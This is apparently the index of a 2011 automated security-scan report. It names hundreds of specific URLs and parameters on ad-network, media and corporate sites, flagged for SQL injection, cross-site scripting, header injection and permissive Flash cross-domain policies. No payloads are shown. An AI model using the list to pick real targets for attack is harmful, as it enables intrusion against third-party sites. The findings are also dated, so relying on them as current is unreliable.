XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 09172011-01

Report generated by XSS.CX at Sat Sep 17 12:36:31 CDT 2011.


1. SQL injection

1.1. http://a.abc.com/service/sfp/omnitureconfig/ [REST URL parameter 1]

1.2. http://ad.doubleclick.net/adi/N884.abc.com/B5709785.10 [id cookie]

1.3. http://ad.doubleclick.net/adj/tmz.toofab.wb.dart/ [name of an arbitrarily supplied request parameter]

1.4. http://adsatt.abc.starwave.com/ad/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif [REST URL parameter 1]

1.5. http://adsatt.abc.starwave.com/ad/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif [REST URL parameter 2]

1.6. http://adsatt.abc.starwave.com/ad/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif [REST URL parameter 3]

1.7. http://adsatt.abc.starwave.com/ad/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif [REST URL parameter 4]

1.8. http://amch.questionmarket.com/adsc/d775029/8/923517/decide.php [REST URL parameter 1]

1.9. http://cdn.media.abc.go.com/m/images/global/generic/logo.png [REST URL parameter 1]

1.10. http://googleads.g.doubleclick.net/pagead/ads [jsv parameter]

1.11. http://googleads.g.doubleclick.net/pagead/ads [slotname parameter]

1.12. http://googleads.g.doubleclick.net/pagead/ads [url parameter]

1.13. http://q1.checkm8.com/adam/detect [C cookie]

1.14. http://q1.checkm8.com/adam/detect [WIDTH_RANGE parameter]

1.15. http://q1.checkm8.com/adam/detect [cat parameter]

1.16. http://q1.checkm8.com/adam/detect [name of an arbitrarily supplied request parameter]

1.17. http://q1.checkm8.com/adam/report [C cookie]

1.18. http://q1.checkm8.com/adam/report [Referer HTTP header]

1.19. http://safebrowsing-cache.google.com/safebrowsing/rd/ChFnb29nLXBoaXNoLXNoYXZhchAAGMnyCSDw8gkqCUx5AgD_____HzIFSXkCAAc [REST URL parameter 1]

1.20. http://showadsak.pubmatic.com/AdServer/AdServerServlet [ktextColor parameter]

1.21. http://tag.contextweb.com/TagPublish/GetAd.aspx [Referer HTTP header]

1.22. http://tag.contextweb.com/TagPublish/GetAd.aspx [ca parameter]

1.23. http://tag.contextweb.com/TagPublish/GetAd.aspx [cwu parameter]

1.24. http://tag.contextweb.com/TagPublish/GetAd.aspx [cxy parameter]

1.25. http://tag.contextweb.com/TagPublish/GetAd.aspx [dw parameter]

1.26. http://tag.contextweb.com/TagPublish/GetAd.aspx [epid parameter]

1.27. http://tag.contextweb.com/TagPublish/GetAd.aspx [esid parameter]

1.28. http://tag.contextweb.com/TagPublish/GetAd.aspx [pb_rtb_ev cookie]

1.29. http://tag.contextweb.com/TagPublish/GetAd.aspx [pxy parameter]

1.30. http://w88.go.com/b/ss/wdgabccom,wdgasec/1/H.16/s3647485188674 [REST URL parameter 3]

1.31. http://w88.go.com/b/ss/wdgabccom,wdgasec/1/H.16/s39185238005593 [REST URL parameter 1]

1.32. http://w88.go.com/b/ss/wdgabccom,wdgasec/1/H.16/s39185238005593 [REST URL parameter 2]

1.33. http://www.bradsdeals.com/dealsoftheday/subscribe/b [s parameter]

1.34. http://www.bradsdeals.com/dealsoftheday/subscribe/b [tid parameter]

1.35. http://www.bradsdeals.com/dealsoftheday/subscribe/b [utm_campaign parameter]

1.36. http://www.bradsdeals.com/dealsoftheday/subscribe/b [utm_content parameter]

1.37. http://www.bradsdeals.com/dealsoftheday/subscribe/b [utm_medium parameter]

1.38. http://www.bradsdeals.com/dealsoftheday/subscribe/b [utm_source parameter]

1.39. http://www.bradsdeals.com/res/opt/global.js [v parameter]

1.40. http://www.bradsdeals.com/res/opt/screen.css [v parameter]

2. Cross-site scripting (stored)

2.1. http://ar.voicefive.com/bmx3/broker.pli [pid parameter]

2.2. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [$ parameter]

2.3. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [$ parameter]

2.4. http://livechat.iadvize.com/chat_init.js [vuid cookie]

3. HTTP header injection

3.1. http://2912a.v.fwmrm.net/ad/l/1 [cr parameter]

3.2. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [$ parameter]

3.3. http://d7.zedo.com/utils/ecSet.js [v parameter]

3.4. http://usadmm.dotomi.com/dmm/servlet/dmm [rurl parameter]

4. Cross-site scripting (reflected)

4.1. http://a.abc.com/service/gremlin/js/files/ifixpng,scrollto,hook,jquery-bbq,jquery-rc4,parseurl,abc-utils,register-loader,social-link,register-abcreg,cookie,msgqueue,swfobject,sendmsg,global,share-global,facebook,facebooklike,autocompleter.js [REST URL parameter 5]

4.2. http://a.abc.com/service/sfp/omnitureconfig/ [pageURL parameter]

4.3. http://a.collective-media.net/adj/cm.rev_bostonherald/ [REST URL parameter 2]

4.4. http://a.collective-media.net/adj/cm.rev_bostonherald/ [name of an arbitrarily supplied request parameter]

4.5. http://a.collective-media.net/adj/cm.rev_bostonherald/ [sz parameter]

4.6. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [REST URL parameter 2]

4.7. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [REST URL parameter 3]

4.8. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [name of an arbitrarily supplied request parameter]

4.9. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [sz parameter]

4.10. http://a.collective-media.net/adj/q1.bosherald/be_news [REST URL parameter 2]

4.11. http://a.collective-media.net/adj/q1.bosherald/be_news [REST URL parameter 3]

4.12. http://a.collective-media.net/adj/q1.bosherald/be_news [name of an arbitrarily supplied request parameter]

4.13. http://a.collective-media.net/adj/q1.bosherald/be_news [sz parameter]

4.14. http://a.collective-media.net/adj/q1.bosherald/ent_fr [REST URL parameter 2]

4.15. http://a.collective-media.net/adj/q1.bosherald/ent_fr [REST URL parameter 3]

4.16. http://a.collective-media.net/adj/q1.bosherald/ent_fr [name of an arbitrarily supplied request parameter]

4.17. http://a.collective-media.net/adj/q1.bosherald/ent_fr [sz parameter]

4.18. http://a.collective-media.net/adj/q1.bosherald/news [REST URL parameter 2]

4.19. http://a.collective-media.net/adj/q1.bosherald/news [REST URL parameter 3]

4.20. http://a.collective-media.net/adj/q1.bosherald/news [name of an arbitrarily supplied request parameter]

4.21. http://a.collective-media.net/adj/q1.bosherald/news [sz parameter]

4.22. http://a.collective-media.net/cmadj/cm.rev_bostonherald/ [REST URL parameter 2]

4.23. http://a.collective-media.net/cmadj/cm.rev_bostonherald/ [sz parameter]

4.24. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [REST URL parameter 1]

4.25. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [REST URL parameter 2]

4.26. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [REST URL parameter 3]

4.27. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [sz parameter]

4.28. http://a.collective-media.net/cmadj/q1.bosherald/be_news [REST URL parameter 1]

4.29. http://a.collective-media.net/cmadj/q1.bosherald/be_news [REST URL parameter 2]

4.30. http://a.collective-media.net/cmadj/q1.bosherald/be_news [REST URL parameter 3]

4.31. http://a.collective-media.net/cmadj/q1.bosherald/be_news [sz parameter]

4.32. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [REST URL parameter 1]

4.33. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [REST URL parameter 2]

4.34. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [REST URL parameter 3]

4.35. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [sz parameter]

4.36. http://a.collective-media.net/cmadj/q1.bosherald/news [REST URL parameter 1]

4.37. http://a.collective-media.net/cmadj/q1.bosherald/news [REST URL parameter 2]

4.38. http://a.collective-media.net/cmadj/q1.bosherald/news [REST URL parameter 3]

4.39. http://a.collective-media.net/cmadj/q1.bosherald/news [sz parameter]

4.40. http://ad.yieldmanager.com/imp [u parameter]

4.41. http://adnxs.revsci.net/imp [Z parameter]

4.42. http://adnxs.revsci.net/imp [s parameter]

4.43. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]

4.44. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]

4.45. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]

4.46. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

4.47. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

4.48. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]

4.49. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]

4.50. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]

4.51. http://alerts.4info.com/alert/ads/dispatcher.jsp [ad_creative_id parameter]

4.52. http://alerts.4info.com/alert/ads/dispatcher.jsp [ad_referral_url parameter]

4.53. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_bg parameter]

4.54. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_bg parameter]

4.55. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_border parameter]

4.56. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_link parameter]

4.57. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_text_normal parameter]

4.58. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_text_normal parameter]

4.59. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_text_title parameter]

4.60. http://alerts.4info.com/alert/ads/dispatcher.jsp [default_league parameter]

4.61. http://alerts.4info.com/alert/ads/dispatcher.jsp [default_team parameter]

4.62. http://api.bizographics.com/v2/profile.redirect [api_key parameter]

4.63. http://api.dimestore.com/viapi [id parameter]

4.64. http://ar.voicefive.com/b/rc.pli [func parameter]

4.65. http://b.scorecardresearch.com/beacon.js [c1 parameter]

4.66. http://b.scorecardresearch.com/beacon.js [c10 parameter]

4.67. http://b.scorecardresearch.com/beacon.js [c15 parameter]

4.68. http://b.scorecardresearch.com/beacon.js [c2 parameter]

4.69. http://b.scorecardresearch.com/beacon.js [c3 parameter]

4.70. http://b.scorecardresearch.com/beacon.js [c4 parameter]

4.71. http://b.scorecardresearch.com/beacon.js [c5 parameter]

4.72. http://b.scorecardresearch.com/beacon.js [c6 parameter]

4.73. http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3 [REST URL parameter 2]

4.74. http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3 [REST URL parameter 3]

4.75. http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3 [REST URL parameter 4]

4.76. http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3 [REST URL parameter 5]

4.77. http://bh.heraldinteractive.com/includes/processAds.bg [companion parameter]

4.78. http://bh.heraldinteractive.com/includes/processAds.bg [companion parameter]

4.79. http://bh.heraldinteractive.com/includes/processAds.bg [page parameter]

4.80. http://bh.heraldinteractive.com/includes/processAds.bg [page parameter]

4.81. http://bh.heraldinteractive.com/includes/processAds.bg [position parameter]

4.82. http://bh.heraldinteractive.com/includes/processAds.bg [position parameter]

4.83. http://blekko.com/autocomplete [query parameter]

4.84. http://bostonherald.com/includes/processAds.bg [companion parameter]

4.85. http://bostonherald.com/includes/processAds.bg [companion parameter]

4.86. http://bostonherald.com/includes/processAds.bg [page parameter]

4.87. http://bostonherald.com/includes/processAds.bg [page parameter]

4.88. http://bostonherald.com/includes/processAds.bg [position parameter]

4.89. http://bostonherald.com/includes/processAds.bg [position parameter]

4.90. http://bostonheraldnie.newspaperdirect.com/epaper/Services/HomePageHandler.ashx [callback parameter]

4.91. http://bostonheraldnie.newspaperdirect.com/epaper/Services/HomePageHandler.ashx [callback parameter]

4.92. http://bostonheraldnie.newspaperdirect.com/epaper/check.session [callback parameter]

4.93. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]

4.94. http://cdnt.meteorsolutions.com/api/ie8_email [id parameter]

4.95. http://cdnt.meteorsolutions.com/api/ie8_email [jsonp parameter]

4.96. http://cdnt.meteorsolutions.com/api/track [jsonp parameter]

4.97. http://choices.truste.com/ca [c parameter]

4.98. http://choices.truste.com/ca [cid parameter]

4.99. http://choices.truste.com/ca [iplc parameter]

4.100. http://choices.truste.com/ca [plc parameter]

4.101. http://choices.truste.com/ca [zi parameter]

4.102. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [$ parameter]

4.103. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [$ parameter]

4.104. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [q parameter]

4.105. http://event.adxpose.com/event.flow [uid parameter]

4.106. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 2]

4.107. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 3]

4.108. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 4]

4.109. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 5]

4.110. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 6]

4.111. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 7]

4.112. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [name of an arbitrarily supplied request parameter]

4.113. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [sz parameter]

4.114. http://g2.gumgum.com/services/get [callback parameter]

4.115. http://ib.adnxs.com/ptj [redir parameter]

4.116. http://ibmwebsphere.tt.omtrdc.net/m2/ibmwebsphere/mbox/standard [mbox parameter]

4.117. http://imp.fetchback.com/serve/fb/adtag.js [clicktracking parameter]

4.118. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]

4.119. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]

4.120. http://jcp.org/en/jsr/all [name of an arbitrarily supplied request parameter]

4.121. http://js.revsci.net/gateway/gw.js [ali parameter]

4.122. http://js.revsci.net/gateway/gw.js [cid parameter]

4.123. http://js.revsci.net/gateway/gw.js [clen parameter]

4.124. http://js.revsci.net/gateway/gw.js [csid parameter]

4.125. http://js.revsci.net/gateway/gw.js [p parameter]

4.126. http://js.revsci.net/gateway/gw.js [pid parameter]

4.127. http://js.revsci.net/gateway/gw.js [pli parameter]

4.128. http://js.revsci.net/gateway/gw.js [ref parameter]

4.129. http://js.revsci.net/gateway/gw.js [sid parameter]

4.130. http://js.revsci.net/gateway/gw.js [ver parameter]

4.131. http://js.revsci.net/gateway/gw.js [vid parameter]

4.132. http://livechat.iadvize.com/rpc/referrer.php [get parameter]

4.133. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/auditude_entertainment_video/preroll/vast/sx/ss/a/@x75 [REST URL parameter 10]

4.134. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/auditude_entertainment_video/preroll/vast/sx/ss/a/@x75 [REST URL parameter 4]

4.135. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/auditude_news_video/preroll/vast/sx/ss/a/@x75 [REST URL parameter 10]

4.136. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/auditude_news_video/preroll/vast/sx/ss/a/@x75 [REST URL parameter 4]

4.137. http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/129334548@x91 [REST URL parameter 4]

4.138. http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/129334548@x91 [REST URL parameter 5]

4.139. http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/129334548@x91 [REST URL parameter 6]

4.140. http://pglb.buzzfed.com/63857/8b52baa86e5b07ac085974feb13e2090 [callback parameter]

4.141. http://pglb.buzzfed.com/63857/bb0a99aabad3110617eff2ef79bb3c27 [callback parameter]

4.142. http://pglb.buzzfed.com/63857/d9dfb925d83ec9decb12af7e255ebee7 [callback parameter]

4.143. http://pixel.adsafeprotected.com/jspix [anId parameter]

4.144. http://pixel.adsafeprotected.com/jspix [campId parameter]

4.145. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]

4.146. http://pixel.adsafeprotected.com/jspix [pubId parameter]

4.147. http://qa.n7.vp2.abc.go.com/crossdomain.xml [REST URL parameter 1]

4.148. http://qa.n7.vp2.abc.go.com/crossdomain.xml [REST URL parameter 1]

4.149. http://qa.n7.vp2.abc.go.com/xml/alert.xml [REST URL parameter 1]

4.150. http://qa.n7.vp2.abc.go.com/xml/alert.xml [REST URL parameter 1]

4.151. http://qa.n7.vp2.abc.go.com/xml/alert.xml [REST URL parameter 2]

4.152. http://query.yahooapis.com/v1/public/yql/uhTrending/cokeTrending2 [limit parameter]

4.153. http://router.infolinks.com/gsd/1316238723013.0 [callback parameter]

4.154. http://router.infolinks.com/gsd/1316238747946.0 [callback parameter]

4.155. http://router.infolinks.com/gsd/1316238789101.0 [callback parameter]

4.156. http://router.infolinks.com/gsd/1316238970770.0 [callback parameter]

4.157. http://router.infolinks.com/gsd/1316239040251.0 [callback parameter]

4.158. http://router.infolinks.com/gsd/1316239125269.0 [callback parameter]

4.159. http://router.infolinks.com/gsd/1316239185968.0 [callback parameter]

4.160. http://router.infolinks.com/gsd/1316239193603.0 [callback parameter]

4.161. http://rt1302.infolinks.com/action/doq.htm [rid parameter]

4.162. http://rt1302.infolinks.com/action/getads.htm [lid parameter]

4.163. http://rt1701.infolinks.com/action/doq.htm [rid parameter]

4.164. http://rt1702.infolinks.com/action/doq.htm [rid parameter]

4.165. http://rt1803.infolinks.com/action/doq.htm [rid parameter]

4.166. http://rt1804.infolinks.com/action/doq.htm [rid parameter]

4.167. http://rt1901.infolinks.com/action/doq.htm [rid parameter]

4.168. http://rt1903.infolinks.com/action/doq.htm [rid parameter]

4.169. http://s19.sitemeter.com/js/counter.asp [site parameter]

4.170. http://s19.sitemeter.com/js/counter.js [site parameter]

4.171. http://secure-us.imrworldwide.com/cgi-bin/m [REST URL parameter 2]

4.172. http://secure-us.imrworldwide.com/cgi-bin/m [at parameter]

4.173. http://secure-us.imrworldwide.com/cgi-bin/m [ci parameter]

4.174. http://secure-us.imrworldwide.com/cgi-bin/m [cr parameter]

4.175. http://secure-us.imrworldwide.com/cgi-bin/m [ep parameter]

4.176. http://secure-us.imrworldwide.com/cgi-bin/m [name of an arbitrarily supplied request parameter]

4.177. http://secure-us.imrworldwide.com/cgi-bin/m [r parameter]

4.178. http://secure-us.imrworldwide.com/cgi-bin/m [rt parameter]

4.179. http://secure-us.imrworldwide.com/cgi-bin/m [st parameter]

4.180. http://showadsak.pubmatic.com/AdServer/AdServerServlet [frameName parameter]

4.181. http://showadsak.pubmatic.com/AdServer/AdServerServlet [frameName parameter]

4.182. http://showadsak.pubmatic.com/AdServer/AdServerServlet [pageURL parameter]

4.183. http://showadsak.pubmatic.com/AdServer/AdServerServlet [ranreq parameter]

4.184. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]

4.185. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]

4.186. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]

4.187. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]

4.188. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]

4.189. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]

4.190. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]

4.191. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]

4.192. http://tps31.doubleverify.com/visit.js [plc parameter]

4.193. http://tps31.doubleverify.com/visit.js [sid parameter]

4.194. http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet [clickData parameter]

4.195. http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet [name of an arbitrarily supplied request parameter]

4.196. http://widgets.mobilelocalnews.com/ [uid parameter]

4.197. http://www-01.ibm.com/support/docview.wss [aid parameter]

4.198. http://www-01.ibm.com/support/docview.wss [name of an arbitrarily supplied request parameter]

4.199. http://www-146.ibm.com/nfluent/transwidget/tw.jsp [cd parameter]

4.200. http://www-146.ibm.com/nfluent/transwidget/tw.jsp [name of an arbitrarily supplied request parameter]

4.201. http://www.bostonherald.com/includes/processAds.bg [companion parameter]

4.202. http://www.bostonherald.com/includes/processAds.bg [companion parameter]

4.203. http://www.bostonherald.com/includes/processAds.bg [page parameter]

4.204. http://www.bostonherald.com/includes/processAds.bg [page parameter]

4.205. http://www.bostonherald.com/includes/processAds.bg [position parameter]

4.206. http://www.bostonherald.com/includes/processAds.bg [position parameter]

4.207. http://www.bradsdeals.com/dealsoftheday/subscribe/b [s parameter]

4.208. http://www.disenter.com/search.php [searchString parameter]

4.209. http://www.disenter.com/search.php [searchString parameter]

4.210. http://www.google.com/search [tch parameter]

4.211. http://www.jcp.org/en/home/index [REST URL parameter 3]

4.212. http://www.jcp.org/en/home/index [name of an arbitrarily supplied request parameter]

4.213. http://www.jcp.org/en/jsr/detail [id parameter]

4.214. http://www.jcp.org/en/jsr/detail [name of an arbitrarily supplied request parameter]

4.215. http://www.kaltura.com//api_v3/index.php [1%3Aaction parameter]

4.216. http://www.kaltura.com//api_v3/index.php [1%3AentryId parameter]

4.217. http://www.kaltura.com//api_v3/index.php [1%3Aservice parameter]

4.218. http://www.kaltura.com//api_v3/index.php [2%3Aaction parameter]

4.219. http://www.kaltura.com//api_v3/index.php [2%3AentryId parameter]

4.220. http://www.kaltura.com//api_v3/index.php [2%3Aservice parameter]

4.221. http://www.kaltura.com//api_v3/index.php [3%3Aaction parameter]

4.222. http://www.kaltura.com//api_v3/index.php [3%3AentryId parameter]

4.223. http://www.kaltura.com//api_v3/index.php [3%3Aservice parameter]

4.224. http://www.kaltura.com//api_v3/index.php [4%3Aaction parameter]

4.225. http://www.kaltura.com//api_v3/index.php [4%3Aservice parameter]

4.226. http://www.kaltura.com//api_v3/index.php [ks parameter]

4.227. http://www.kaltura.com//api_v3/index.php [name of an arbitrarily supplied request parameter]

4.228. http://www.kaltura.com//api_v3/index.php [service parameter]

4.229. http://www.open.com.au/cgi-bin/sf.cgi [config parameter]

4.230. https://www.open.com.au/cgi-bin/sf.cgi [config parameter]

4.231. https://www.open.com.au/onlineorder.php [name of an arbitrarily supplied request parameter]

4.232. http://www.vm.ibm.com/search/search.cgi [FILTER parameter]

4.233. http://www.vm.ibm.com/search/search.cgi [FILTER parameter]

4.234. http://www.vm.ibm.com/search/search.cgi [WORDS parameter]

4.235. http://www.vm.ibm.com/search/search.cgi [WORDS parameter]

4.236. http://www.westhost.com/images/bluegradbg.gif [REST URL parameter 1]

4.237. http://www.westhost.com/images/bluegradbg.gif [name of an arbitrarily supplied request parameter]

4.238. http://www.westhost.com/images/boxtopbackground.gif [REST URL parameter 1]

4.239. http://www.westhost.com/images/boxtopbackground.gif [name of an arbitrarily supplied request parameter]

4.240. http://adnxs.revsci.net/imp [Referer HTTP header]

4.241. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [Referer HTTP header]

4.242. http://livechat.iadvize.com/chat_init.js [Referer HTTP header]

4.243. http://pixel.adsafeprotected.com/jspix [Referer HTTP header]

4.244. http://www.westhost.com/images/bluegradbg.gif [Referer HTTP header]

4.245. http://www.westhost.com/images/boxtopbackground.gif [Referer HTTP header]

4.246. http://3ps.go.com/DynamicAd [tqq cookie]

4.247. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

4.248. http://ar.voicefive.com/bmx3/broker.pli [ar_p110620504 cookie]

4.249. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

4.250. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]

4.251. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]

4.252. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [ZEDOIDA cookie]

4.253. http://livechat.iadvize.com/chat_init.js [vuid cookie]

4.254. http://s19.sitemeter.com/js/counter.asp [IP cookie]

4.255. http://s19.sitemeter.com/js/counter.js [IP cookie]

4.256. http://www.websitealive2.com/89/visitor/vTrackerSrc_v2.asp [wsa cookie]

5. Flash cross-domain policy

5.1. http://2912a.v.fwmrm.net/crossdomain.xml

5.2. http://3ps.go.com/crossdomain.xml

5.3. http://a.collective-media.net/crossdomain.xml

5.4. http://a.tribalfusion.com/crossdomain.xml

5.5. http://a1.interclick.com/crossdomain.xml

5.6. http://abc.csar.go.com/crossdomain.xml

5.7. http://action.media6degrees.com/crossdomain.xml

5.8. http://ad.afy11.net/crossdomain.xml

5.9. http://ad.auditude.com/crossdomain.xml

5.10. http://ad.turn.com/crossdomain.xml

5.11. http://adm.fwmrm.net/crossdomain.xml

5.12. http://admin.brightcove.com/crossdomain.xml

5.13. http://ads.yimg.com/crossdomain.xml

5.14. http://adserver.teracent.net/crossdomain.xml

5.15. http://adunit.cdn.auditude.com/crossdomain.xml

5.16. http://afe.specificclick.net/crossdomain.xml

5.17. http://alerts.4info.com/crossdomain.xml

5.18. http://amch.questionmarket.com/crossdomain.xml

5.19. http://analytics.newsinc.com/crossdomain.xml

5.20. http://aperture.displaymarketplace.com/crossdomain.xml

5.21. http://api.dimestore.com/crossdomain.xml

5.22. http://api.facebook.com/crossdomain.xml

5.23. http://ar.voicefive.com/crossdomain.xml

5.24. http://as.casalemedia.com/crossdomain.xml

5.25. http://as1.suitesmart.com/crossdomain.xml

5.26. http://assets.newsinc.com/crossdomain.xml

5.27. http://at.amgdgt.com/crossdomain.xml

5.28. http://b.voicefive.com/crossdomain.xml

5.29. http://b3.mookie1.com/crossdomain.xml

5.30. http://beta.abc.go.com/crossdomain.xml

5.31. http://bp.specificclick.net/crossdomain.xml

5.32. http://bs.serving-sys.com/crossdomain.xml

5.33. http://c.betrad.com/crossdomain.xml

5.34. http://c.brightcove.com/crossdomain.xml

5.35. http://cache.specificmedia.com/crossdomain.xml

5.36. http://cache2-scripts.pressdisplay.com/crossdomain.xml

5.37. http://cache2-styles.pressdisplay.com/crossdomain.xml

5.38. http://cdn.gigya.com/crossdomain.xml

5.39. http://cdn.kaltura.com/crossdomain.xml

5.40. http://cdn.turn.com/crossdomain.xml

5.41. http://cdnbakmi.kaltura.com/crossdomain.xml

5.42. http://clk.atdmt.com/crossdomain.xml

5.43. http://cplads.appspot.com/crossdomain.xml

5.44. http://d14.zedo.com/crossdomain.xml

5.45. http://d7.zedo.com/crossdomain.xml

5.46. http://dc.tremormedia.com/crossdomain.xml

5.47. http://dp.33across.com/crossdomain.xml

5.48. http://ds.serving-sys.com/crossdomain.xml

5.49. http://edge.aperture.displaymarketplace.com/crossdomain.xml

5.50. http://event.adxpose.com/crossdomain.xml

5.51. http://external.ak.fbcdn.net/crossdomain.xml

5.52. http://fw.adsafeprotected.com/crossdomain.xml

5.53. http://g-pixel.invitemedia.com/crossdomain.xml

5.54. http://g.ca.bid.invitemedia.com/crossdomain.xml

5.55. http://g2.gumgum.com/crossdomain.xml

5.56. http://goku.brightcove.com/crossdomain.xml

5.57. http://gscounters.gigya.com/crossdomain.xml

5.58. http://i.w55c.net/crossdomain.xml

5.59. http://ib.adnxs.com/crossdomain.xml

5.60. http://imagec12.247realmedia.com/crossdomain.xml

5.61. http://imp.fetchback.com/crossdomain.xml

5.62. http://js.revsci.net/crossdomain.xml

5.63. http://l.betrad.com/crossdomain.xml

5.64. http://l.yimg.com/crossdomain.xml

5.65. http://ll.static.abc.com/crossdomain.xml

5.66. http://llnwdo28.tmz.com/crossdomain.xml

5.67. http://load.exelator.com/crossdomain.xml

5.68. http://load.tubemogul.com/crossdomain.xml

5.69. http://loadm.exelator.com/crossdomain.xml

5.70. http://log.go.com/crossdomain.xml

5.71. http://map.media6degrees.com/crossdomain.xml

5.72. http://media.fastclick.net/crossdomain.xml

5.73. http://metrics.tmz.com/crossdomain.xml

5.74. http://network.realmedia.com/crossdomain.xml

5.75. http://oascentral.bostonherald.com/crossdomain.xml

5.76. http://objects.tremormedia.com/crossdomain.xml

5.77. http://odb.outbrain.com/crossdomain.xml

5.78. http://ping.crowdscience.com/crossdomain.xml

5.79. http://pix04.revsci.net/crossdomain.xml

5.80. http://pixel.33across.com/crossdomain.xml

5.81. http://pixel.adsafeprotected.com/crossdomain.xml

5.82. http://pixel.invitemedia.com/crossdomain.xml

5.83. http://ps2.newsinc.com/crossdomain.xml

5.84. http://puma.vizu.com/crossdomain.xml

5.85. http://q1.checkm8.com/crossdomain.xml

5.86. http://query.yahooapis.com/crossdomain.xml

5.87. http://r.casalemedia.com/crossdomain.xml

5.88. http://r.turn.com/crossdomain.xml

5.89. http://r1-ads.ace.advertising.com/crossdomain.xml

5.90. http://r1.zedo.com/crossdomain.xml

5.91. http://receive.inplay.tubemogul.com/crossdomain.xml

5.92. http://resources.infolinks.com/crossdomain.xml

5.93. http://rs.gwallet.com/crossdomain.xml

5.94. http://rt1302.infolinks.com/crossdomain.xml

5.95. http://rt1701.infolinks.com/crossdomain.xml

5.96. http://rt1702.infolinks.com/crossdomain.xml

5.97. http://rt1803.infolinks.com/crossdomain.xml

5.98. http://rt1804.infolinks.com/crossdomain.xml

